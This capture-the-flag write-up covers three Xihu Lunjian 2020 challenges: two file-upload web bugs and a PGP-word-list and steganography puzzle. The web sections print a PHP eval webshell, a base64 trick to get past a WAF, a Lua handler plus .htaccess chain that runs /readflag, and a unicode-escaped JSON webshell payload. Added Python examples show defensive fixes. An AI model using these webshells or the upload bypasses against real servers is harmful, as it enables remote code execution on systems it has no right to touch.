西湖论剑 newupload
The page is a file upload form. The filename may not contain "php", and the file header is checked. According to the writeup, the header check can be bypassed with a newline; the file content is checked as well, so the shell has to be uploaded inside a PNG image (a picture shell).

When trying to get a shell, the requests turn out to be blocked by the 宝塔 (BT panel) WAF, so use base64 to get past it and re-upload the shell:

```php
<?php eval(base64_decode($_POST['penson'])); ?>
```

It runs successfully.
When calling system(), the error message shows that system is disabled.

Looking back at phpinfo, open_basedir is restricted as well. I originally wanted to connect with 蚁剑 (AntSword), but for some reason it would not connect.

Bypassing open_basedir here: this bypass doesn't work. emmm, noting it down for now.

Now the key part. Upload an .htaccess file that makes Apache handle .lua files as scripts, then use a Lua file to execute /readflag. No idea how they found that, emmm. The writeup is here:
http://www.qfrost.com/CTF/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91_2020/
```php
<?php
// Write a Lua handler that runs /readflag and returns its output as text/plain
file_put_contents('1.lua', 'require "string"
function handle(r)
    r.content_type = "text/plain"
    if r.method == "GET" then
        local a = io.popen("/readflag")
        local b = a:read("*all")
        r:puts(b)
    end
    return apache2.OK
end');

// Tell Apache (mod_lua) to execute every .lua file in this directory as a script
file_put_contents('.htaccess', '<Files "*.lua">
SetHandler lua-script
</Files>');
```
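From the defender's side, the three weaknesses this challenge chains are a blacklist on the filename, a header check that does not insist the magic bytes come first, and the fact that an uploaded .htaccess is honoured at all. The following is an added example (not the challenge's source, and the weak check is my assumption about one common way such a check is written) that puts the weak header check beside an anchored one and an allowlist-based filename policy; `validate_upload`, `filename_ok` and `ALLOWED_EXT` are names chosen here.

```python
import re

# Constructed illustration: a header check that a leading newline slips past,
# beside an anchored check and an allowlist filename policy.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}   # assumed policy for this example


def weak_header_check(data):
    """Assumed weak form: a MULTILINE regex accepts the magic at the start of
    *any* line, so a body that begins with a newline still passes."""
    return re.search(rb"^\x89PNG\r\n\x1a\n", data, re.MULTILINE) is not None


def strict_header_check(data):
    """Anchored: the magic must be the very first bytes of the file."""
    return data.startswith(PNG_MAGIC)


def filename_ok(name):
    """Allowlist instead of blacklist; also refuse dotfiles such as .htaccess."""
    base = name.rsplit("/", 1)[-1]
    if base.startswith(".") or "\x00" in base:
        return False, "dotfiles (e.g. .htaccess) and NUL bytes are refused"
    if "." not in base:
        return False, "no extension"
    # Every part after the first dot must be allowlisted, so both
    # "x.png.php" and "x.php.png" are rejected.
    parts = base.lower().split(".")[1:]
    if any(p not in ALLOWED_EXT for p in parts):
        return False, "extension not in allowlist"
    return True, ""


def validate_upload(name, data):
    """Combined decision: (accepted, reason)."""
    ok, why = filename_ok(name)
    if not ok:
        return False, why
    if not strict_header_check(data):
        return False, "content does not start with a PNG header"
    return True, ""
```

The dotfile rule matters because the next step in this challenge is an uploaded .htaccess that registers a handler; serving the upload directory with `AllowOverride None` removes that path on the Apache side as well, and a valid PNG with PHP inside it is only harmless as long as nothing ever executes it.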
西湖论剑 easyjson

Looking at the source: later on there is a function that checks the filename and the file content, then writes the file out in JSON format.

Damn, I didn't really look at this one; I've done a similar challenge before. Unicode escape bypass:
https://blog.csdn.net/SopRomeo/article/details/107636982

JSON decoding resolves \uXXXX escapes automatically, which is quite hard to come up with black-box. The source that another player pulled shows the filter is applied to the filename. Just upload a shell directly.

payload:

```json
{"\u0063\u006f\u006e\u0074\u0065\u006e\u0074":"\u003c\u003f\u0070\u0068\u0070 \u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0050\u004f\u0053\u0054\u005b\u0027\u0070\u0065\u006e\u0073\u006f\u006e\u0027\u005d\u0029\u003b\u003f\u003e"}
```

Then just look for the flag; no privilege escalation needed, it can be read directly.
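The bug class here is a filter that inspects the raw request body before the JSON is parsed, so anything hidden behind \uXXXX escapes never matches. The block below is an added example, not the challenge's source: it is written in Python (PHP's json_decode resolves the escapes the same way), the blocked-string list is my assumption about what such a filter might contain, and `weak_filter`, `hardened_filter`, `build_request` and `u_escape` are names chosen here. The constructed body carries a harmless `<?php echo 1; ?>` instead of the challenge payload.

```python
import json

# Assumed blacklist of the kind a raw-text filter might apply.
BLOCKED = ("<?php", "<?", "eval(")


def u_escape(s):
    """Rewrite every character of s as a JSON \\uXXXX escape (BMP only)."""
    return "".join("\\u%04x" % ord(ch) for ch in s)


def weak_filter(raw):
    """Blacklist applied to the raw request body BEFORE parsing: escapes hide content."""
    return not any(bad in raw.lower() for bad in BLOCKED)


def hardened_filter(raw):
    """Parse first, then apply the same blacklist to every decoded key and string value."""
    try:
        obj = json.loads(raw)
    except ValueError:
        return False

    def walk(v):
        if isinstance(v, dict):
            return all(walk(k) and walk(x) for k, x in v.items())
        if isinstance(v, list):
            return all(walk(x) for x in v)
        if isinstance(v, str):
            return not any(bad in v.lower() for bad in BLOCKED)
        return True

    return walk(obj)


def build_request(content):
    """Constructed body with both key and value fully escaped, mirroring the payload shape."""
    return '{"%s":"%s"}' % (u_escape("content"), u_escape(content))


def decoded_content(raw):
    """What the application actually writes to disk after json.loads."""
    return json.loads(raw)["content"]
```

The hardened version is not a better blacklist; the point is that any check on uploaded content has to run on the decoded value the application will store, never on the wire encoding.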
Misc yusapapa

Looking at the source: it's the PGP word list.
https://zh.wikipedia.org/wiki/PGP%E8%AF%8D%E6%B1%87%E8%A1%A8

Scrape the table:
```python
import requests
from bs4 import BeautifulSoup

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'
}
url = 'https://zh.wikipedia.org/wiki/PGP%E8%AF%8D%E6%B1%87%E8%A1%A8'
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')

# Each wikitable row is: hex value | even word | odd word
tables = soup.find_all('table', class_='wikitable')
found = {}
for table in tables:
    rows = table.find_all('tr')
    for row in rows[1:]:  # skip the header row
        td = row.find_all('td')
        value = td[0].get_text().strip()  # hex byte value
        even = td[1].get_text().strip()
        odd = td[2].get_text().strip()
        found[value] = [even, odd]

text = 'endow gremlin indulge bison flatfoot fallout goldfish bison hockey fracture fracture bison goggles jawbone bison flatfoot gremlin glucose glucose fracture flatfoot indoors gazelle gremlin goldfish bison guidance indulge keyboard keyboard glucose fracture hockey bison gazelle goldfish bison cement frighten gazelle goldfish indoors buzzard highchair fallout highchair bison fallout goldfish flytrap bison fallout goldfish gremlin indoors frighten fracture highchair bison cement fracture goldfish flatfoot gremlin flytrap fracture buzzard guidance goldfish freedom buzzard allow crowfoot jawbone bison indoors frighten fracture bison involve fallout jawbone Burbank indoors frighten fracture bison guidance gazelle flatfoot indoors indulge highchair fracture bison hockey frighten gremlin indulge flytrap bison flagpole fracture bison indulge hockey fracture flytrap bison allow blockade endow indulge hockey fallout blockade bison gazelle hockey bison inverse fracture highchair jawbone bison gazelle goggles guidance gremlin highchair indoors fallout goldfish indoors bison gazelle goldfish bison indoors frighten gazelle hockey bison flatfoot frighten fallout glucose glucose fracture goldfish freedom fracture blackjack blackjac'

# Map each word back to its hex value; either column counts, since the
# challenge text does not alternate even/odd words
flag = ''
for word in text.split(' '):
    for key in found:
        if word in found[key]:
            flag += key
print(flag)
```
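The real PGP word list has two words per byte value: a two-syllable "even" word and a three-syllable "odd" word, and a standard encoding alternates them by byte position so that a dropped or doubled word is detectable. The challenge text above uses the even column throughout, which is why the scraper matches against both columns. The block below is an added example that works offline (not the challenge's script): it embeds a constructed subset of the real list covering only the words needed for the first sentence of the challenge text, and its decoder reports parity errors; the names `encode_pgp`, `decode_pgp` and `decode_challenge_prefix` are chosen here.

```python
# Constructed subset of the PGP word list: byte value -> (even word, odd word).
# Only the entries needed for the first 34 words of the challenge text are present.
PGP_WORDS = {
    0x20: ("bison", "butterfat"),
    0x59: ("endow", "filament"),
    0x61: ("fallout", "glossary"),
    0x63: ("flatfoot", "graduate"),
    0x65: ("fracture", "guitarist"),
    0x69: ("gazelle", "hazardous"),
    0x6C: ("glucose", "hesitate"),
    0x6D: ("goggles", "hideaway"),
    0x6E: ("goldfish", "holiness"),
    0x6F: ("gremlin", "hurricane"),
    0x70: ("guidance", "hydraulic"),
    0x73: ("hockey", "inception"),
    0x74: ("indoors", "indigo"),
    0x75: ("indulge", "inertia"),
    0x79: ("jawbone", "insincere"),
    0x7A: ("keyboard", "insurgent"),
}

# word -> (byte value, column) where column 0 is even, 1 is odd
WORD_TO_BYTE = {w.lower(): (val, col)
                for val, pair in PGP_WORDS.items()
                for col, w in enumerate(pair)}


def encode_pgp(data):
    """Standard encoding: byte i uses the even word when i is even, the odd word otherwise."""
    return [PGP_WORDS[b][i % 2] for i, b in enumerate(data)]


def decode_pgp(words, strict=True):
    """Map words back to bytes. A word from the wrong column at position i is a
    parity error (the list's built-in check against dropped or duplicated words).
    Returns (bytes, list_of_error_positions); in strict mode an error raises."""
    out = bytearray()
    errors = []
    for i, w in enumerate(words):
        val, col = WORD_TO_BYTE[w.lower()]
        if col != i % 2:
            errors.append(i)
            if strict:
                raise ValueError("word %d (%r) is from the wrong column" % (i, w))
        out.append(val)
    return bytes(out), errors


# First 34 words of the challenge text, copied from the scraper above.
CHALLENGE_PREFIX = ("endow gremlin indulge bison flatfoot fallout goldfish bison "
                    "hockey fracture fracture bison goggles jawbone bison flatfoot "
                    "gremlin glucose glucose fracture flatfoot indoors gazelle gremlin "
                    "goldfish bison gazelle goldfish bison guidance indulge keyboard "
                    "keyboard glucose fracture hockey").split()


def decode_challenge_prefix():
    """The challenge uses even-column words everywhere, so only lenient mode decodes it."""
    data, _ = decode_pgp(CHALLENGE_PREFIX, strict=False)
    return data.decode("ascii")
```

Running `decode_challenge_prefix()` gives the opening of the hidden message; a strict decode of the same words fails at the second word, which is exactly the signal a standards-following decoder would use to reject a garbled transcription.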
This yields /hint.rar and encode.png to download.

I only got this far at the time. emmm

The writeup says encode.webp also carries steganography:
http://www.jojo-m.cn/2020/10/09/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/#Yusapapa

It uses the stegpy tool (never seen it before). Install guide:
https://blog.csdn.net/Amherstieae/article/details/109010064

I couldn't download that webp; the writeup has it:

```text
the_password_is:Yus@_1s_YYddddsstegpy encode.webp the_key_is:Yus@_yydsstegpy!!
```

The second one is the password for hint.rar. Next comes Invisible Secrets steganography; the challenge hint said Yusa is important. This tool generates a .py file automatically.

Damn, I don't know what that encode is for. emmm

exp:
```python
from PIL import Image

p = Image.open('encode.png').convert('RGB')
a, b = p.size

# Each channel of every pixel as an 8-bit binary string, column by column
R = []
G = []
B = []
for x in range(a):
    for y in range(b):
        R.append(bin(p.getpixel((x, y))[0]).replace('0b', '').zfill(8))
        G.append(bin(p.getpixel((x, y))[1]).replace('0b', '').zfill(8))
        B.append(bin(p.getpixel((x, y))[2]).replace('0b', '').zfill(8))

# Keep only the least significant bit of each channel
R1 = []
G1 = []
B1 = []
flag = []
for i in range(len(R)):
    R1.append(int(R[i][-1:]))
    G1.append(int(G[i][-1:]))
    B1.append(int(B[i][-1:]))
print(R1[100:150])  # debug peek at the bit planes
print(G1[100:150])
print(B1[100:150])

# The hidden bit of each pixel is the XOR of the three LSBs
for i in range(len(R1)):
    flag.append(B1[i] ^ G1[i] ^ R1[i])
print(flag[100:150])

# Render the recovered bit plane as a black-and-white image
de_p = Image.new('L', (a, b), 255)
c = 0
for x in range(a):
    for y in range(b):
        if flag[c] == 1:
            de_p.putpixel((x, y), 0)
        else:
            de_p.putpixel((x, y), 255)
        c = c + 1
de_p.save('out.png')
```
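The script above recovers one bit per pixel as the XOR of the three channel LSBs. To make that mechanism concrete end to end, here is an added example (not the challenge's script) that embeds a message with that exact scheme into a constructed cover, recovers it the same way, and adds a crude detection heuristic: ASCII has a zero high bit, so in a plane that carries text every eighth bit is 0, while a clean cover hovers near 50%. Plain lists of (r, g, b) tuples stand in for PIL pixels so it runs without Pillow; the names `embed_bits`, `extract_bits`, `msb_zero_ratio` and `roundtrip` are chosen here.

```python
import random


def embed_bits(pixels, bits):
    """Return a copy of pixels where LSB(R)^LSB(G)^LSB(B) of pixel i equals bits[i].
    Only the blue LSB is flipped when needed, so each carrier pixel changes by at
    most one intensity level in one channel."""
    out = list(pixels)
    for i, bit in enumerate(bits):
        r, g, b = out[i]
        if ((r ^ g ^ b) & 1) != bit:
            b ^= 1
        out[i] = (r, g, b)
    return out


def extract_bits(pixels):
    """Same step as the challenge script: one bit per pixel from the three LSBs."""
    return [(r ^ g ^ b) & 1 for r, g, b in pixels]


def text_to_bits(s):
    return [int(ch) for c in s for ch in format(ord(c), "08b")]


def bits_to_text(bits):
    return "".join(chr(int("".join(map(str, bits[i:i + 8])), 2))
                   for i in range(0, len(bits) - 7, 8))


def random_cover(n_pixels, seed=1):
    """Constructed cover: seeded pseudo-random RGB pixels (deterministic)."""
    rng = random.Random(seed)
    return [(rng.randrange(256), rng.randrange(256), rng.randrange(256))
            for _ in range(n_pixels)]


def msb_zero_ratio(bits):
    """Share of every-eighth bits that are 0: 1.0 for ASCII text, about 0.5 otherwise."""
    firsts = bits[0::8]
    return sum(1 for b in firsts if b == 0) / len(firsts)


def roundtrip(message, n_pixels=1024):
    """Embed, extract, and report (recovered text, pixels changed,
    text-region ratio on the stego image, whole-plane ratio on the clean cover)."""
    cover = random_cover(n_pixels)
    stego = embed_bits(cover, text_to_bits(message))
    bits = extract_bits(stego)
    recovered = bits_to_text(bits[:8 * len(message)])
    changed = sum(1 for x, y in zip(cover, stego) if x != y)
    return (recovered, changed,
            msb_zero_ratio(bits[:8 * len(message)]),
            msb_zero_ratio(extract_bits(cover)))
```

The heuristic is deliberately simple: it only works on unencrypted ASCII laid out sequentially, which is the case in this challenge, and is meant to show why rendering the XOR plane as an image (as the script does with out.png) makes structure visible at all.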
I need to learn that library, emmm.